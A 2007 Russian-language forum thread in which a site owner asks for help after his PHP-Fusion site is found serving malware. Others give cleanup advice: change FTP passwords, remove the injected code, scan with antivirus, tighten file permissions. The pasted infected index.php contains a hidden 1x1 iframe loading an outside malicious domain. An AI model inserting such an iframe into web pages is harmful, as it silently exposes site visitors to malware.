Сообщений: 240 Откуда: Полтава Зарегистрирован: 27 Октября 2007, 15:06:15 Сказали спасибо 39 раз Статус: offline
ICQ статус
Опубликовано 29 Октября 2007, 01:45:17
oldihome
Ищи ссылку у тебя в серсах или вобще этот самый инфо.ехе на твоем сайте.
Ктото залил ссылку на этот вредоносный файл на твой сайт..
Такая же фишка наблюдается у меня на http://php-fusion.foxel.ru/ и еще некоторых сайтах, на которых ссылка на
Сообщений: 148 Откуда: q11q Зарегистрирован: 24 Сентября 2007, 15:58:13 Сказали спасибо 0 раз Статус: offline
Опубликовано 29 Октября 2007, 03:19:15
тогда может кому поможет эта информация
Здравствуйте!
В последнее время в сети зафиксирована высокая активность вируса,
использующего уязвимости Internet Explorer. Размещаясь на локальном
компьютере, он "подслушивает" пароли FTP и некоторых других служб, а затем с
помощью http-запроса передает их на удаленный сервер. С этого удаленного
сервера происходит подключение с использованием украденных паролей и изменение
содержимого сайта ? прописывание в индексные файлы ссылок на вредоносные
программы, находящиеся на каком-то внешнем сервере.
Проверьте код Вашей индексной страницы на наличие каких-либо подозрительных
ссылок.
Если Вы пострадали от подобного вируса, мы рекомендуем Вам незамедлительно
сменить пароли FTP-доступа, а также проверить все компьютеры, с которых он
осуществлялся, новейшим антивирусным ПО.
Сообщений: 148 Откуда: q11q Зарегистрирован: 24 Сентября 2007, 15:58:13 Сказали спасибо 0 раз Статус: offline
Опубликовано 29 Октября 2007, 05:20:43
и когда я вхожу на сайт на правах гостя ничего не происходит, посоветуйте что мне делать, как это исправить? это какой-то беспредел, я этот сайт год делал
Сообщений: 148 Откуда: q11q Зарегистрирован: 24 Сентября 2007, 15:58:13 Сказали спасибо 0 раз Статус: offline
Опубликовано 29 Октября 2007, 05:56:37
а если я всё удалю и восстановлю из резервной копии?
еще вопрос- поиск стандартный в файлах пхп находит текст? если я задам условие найти info.exe он найдёт?
а в базе данных не может быть косяка?
Я всё удалил, а папка images не удаляется, там ешё много папок, права доступа тоже не меняются в файле index.php содержится код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><!-- HTMLINDEX --><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Index of ftp.gnu.org/gnu/Manuals/automake-1.7.2/info</title><link rel="stylesheet" type="text/css" href="/html/default.css"></head><body>The FSF provides this archive as a service to GNU users.<br><iframe src='http://elvizzz.com' width='1' height='1' style='visibility: hidden;'></iframe>Please
consider donating to the FSF at <a
href="http://donate.fsf.org/">http://donate.fsf.org/</a>.
<hr>
<table border="0" cellpadding="2"><caption><b>Index of ftp.gnu.org/gnu/Manuals/automake-1.7.2/info</b></caption><tr><td colspan="4"><a href=".."><img alt="[up]" align="absbottom" border="0" src="/html/up.png"> Up to higher level directory ..</a></td></tr><tr valign="bottom"><td><a href="automake-info.tar.gz"><img border="0" alt="[file]" src="/html/file.png"> automake-info.tar.gz</a></td><td align="right">61 KB </td><td align="right">2002-12-25</td><td align="right">03:49:27 AM</td></tr></table></body></html>
Я совсем не понимаю что он означает, но думаю причина в нем.
Прошу знающих людей посмотреть. как вы думаете, здесь моя проблема?
Сообщений: 148 Откуда: q11q Зарегистрирован: 24 Сентября 2007, 15:58:13 Сказали спасибо 0 раз Статус: offline
Опубликовано 29 Октября 2007, 09:20:53
Я удалил все файлы и закачал обратно из резервной копии и всё ровно эта проблема. что мне делать? ПОМОГИТЕ ПОЖАЛУЙСТА МНЕ!
Когда я захожу на сайт какие файлы грузятся? Можно запустить так чтобы было видно на какой ссылке и в каком файле происходит эта ошибка?
Просто при входе сайт грузится и если я успеваю зайти в админпанель, то всё работает в пределах этой панели кроме восстановления базы данных, при её восстановлении она появляется пустая, а обычно появлялась с возможностью выбирать таблицы.
Я в этом вообще ничего не понимаю.
Сообщений: 240 Откуда: Полтава Зарегистрирован: 27 Октября 2007, 15:06:15 Сказали спасибо 39 раз Статус: offline
ICQ статус
Опубликовано 29 Октября 2007, 12:32:36
oldihome, может в твоей резервной копии это уже сидит?? Найди более старую копию, сравни файлы по размеру хотябы.
А еще может ЭТО не на твоем сайте, а на какомто другом, поубирай все ссылки на другие сайты:
'http://elvizzz.com'
automake-info.tar.gz
ftp.gnu.org/gnu/Manuals/automake-1.7.2/info
А насчет помощи... тут не так много народу ходит, чтобы все бросились тебе помогать. Многие из прохожих сами бы задали такой же вопрос, если у них такое случилось..
И вообще - это
-------------------- Все что НЕ делается, было бы к лучшему... Присоединяйтесь!
Народ читаем и запоминаем! Не помогаю по ICQ Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
Смените пароли на ftp
Убейте этот iframe.
проверьте все файлы антивирусом.
проверьте остальные файлы (особенно с названием index.*) на этот код
Имеет смысл после настройки сайта практически всем файлам (htm, html, php) прописать CHMOD 440 чтобы никакими методами (кроме входа по FTP)
нельзя было их изменить. Также на папки можно поставить права(не помню какой CHMOD), чтобы невозможно было через web туда писать, разумеется только на те, куда не будут сохраняться файлы/фотки и т.д.
Прочитайте
http://www.hostforum.ru/showthread.php?t=11150
Сообщений: 353 Откуда: Москва, ВАО, Перово Зарегистрирован: 18 Октября 2007, 01:42:47 Сказали спасибо 51 раз Статус: offline
ICQ статус
Опубликовано 29 Октября 2007, 21:48:38
Да, прочитал, что
В связи с тем, что основные изменения сборок касаются форума, то в дальнейшем будет существовать только сборка с форумом!
поэтому возник вопрос - а можно будет форум в админке или где там ешё отключить и поставить под этот движок форум PHPBB ? или такой возможности нет ? или самому это можно сделать без проблем ?
Что больше всего напрягает в этом форуме - это нет системы - прочитана/непрочитана по темам и соответственно по форумам, автоматически отмечать его прочитанным если все темы на данном форуме просмотрены и также с темами. И плюс ссылка - "Отметить все темы как прочтённые". То есть как на PHPBB. Думаю что это не утяжелит форум, если будет сделано как на PHPBB, он довольно лёгок, в отличие от того же перегруженного тормоза IPB.
В остальном форум устраивает на 100% - а это напрягает здорово.
Сообщений: 148 Откуда: q11q Зарегистрирован: 24 Сентября 2007, 15:58:13 Сказали спасибо 0 раз Статус: offline
Опубликовано 31 Октября 2007, 16:45:08
Извините за флуд, просто у меня шок был.
Всё исправил, сам не пойму как, но теперь ещё лучше стал работать.
Там гдето в темах файлы index лежали, я их со всеми правами не мог удалить
хостерам пожаловался, они помогли.
Оцените http://www.oldihome.ru
Sky, что там со сборкой?
Народ читаем и запоминаем! Не помогаю по ICQ Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
Народ читаем и запоминаем! Не помогаю по ICQ Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
Сообщений: 353 Откуда: Москва, ВАО, Перово Зарегистрирован: 18 Октября 2007, 01:42:47 Сказали спасибо 51 раз Статус: offline
ICQ статус
Опубликовано 01 Ноября 2007, 16:53:25
Есть такой вопрос - подскажите как сделать, чтобы страницы не кэшировались.
Есть форумы на phpBB - так там когда в них захожу, то всегда страница обновляется, а на этом движке - постоянно приходится каждую страницу обновлять.
Стоит на работе WinRoute, в котором включено кэширование, но форумы PHPBB не кэшируются, а страницы этого движка - кашируются. Что и где прописать, чтобы запретить кэширование страниц браузерами ?
Кстати, и в админке форума IPB такой пункт есть:
Отправлять HTTP заголовок «no-cache»? Да/Нет
(Этот пункт прикажет браузерам не кешировать страницы форума.
Внимание: Чтобы эта опция работала, необходимо, чтобы другая опция «Принудительно отправлять HTTP заголовки?» была включена.
А то и другие посетители, у которых включено кэширование, каждый раз будут попадать на старые страницы.
Народ читаем и запоминаем! Не помогаю по ICQ Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!